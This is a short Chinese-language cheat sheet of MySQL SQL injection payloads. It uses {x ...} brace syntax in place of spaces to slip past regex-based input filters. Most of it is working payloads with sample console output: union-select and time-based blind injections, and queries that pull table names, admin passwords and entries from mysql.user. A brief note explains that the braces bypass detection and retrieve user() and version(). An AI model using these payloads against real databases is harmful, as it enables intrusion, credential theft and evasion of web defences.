-
select
{
x table_name
}
from
{
x information_schema
.
tables
}
-
(select(select{x pwd}from{x %23@__admin}+limit+1))
-
select{x user}from{1d admin}
-
union select (select{x user}from{1d admin}+limit+1),1
-
1' and if(ascii(substr((select{1d user()}),1,1))>11,sleep(1),1)
-
select
{
x user
}
from
{
x mysql
.
user
};
-
select
{
x user
}
from
{
x mysql
.
user
}
limit
1
;
mysql> select{x version()}from{x user};
+---------------+
| {x version()} |
+---------------+
| 5.5.20-log |
| 5.5.20-log |
| 5.5.20-log |
| 5.5.20-log |
+---------------+
4 rows in set (0.00 sec)select{x a}from{x b} . b为当前数据库存在的任意表名,a就是你要返回的内容。我所能想到的场景就是获取user() ,version()之类的 {}代替空格绕过正则的检测,直接 select{x (user())}或者 select(user())
要获取其它信息的话,像这样。
mysql> select{x (select user from user limit 1)} from{x user};
+-------------------------------------+
| {x (select user from user limit 1)} |
+-------------------------------------+
| root |
| root |
| root |
| root |+-------------------------------------+
去掉空格:
mysql
>
select
{
x
(
name
)}
from
{
x
(
test
)};
select
{
x
+
table_name
}
from
{
x
(
information_schema
.
tables
)}
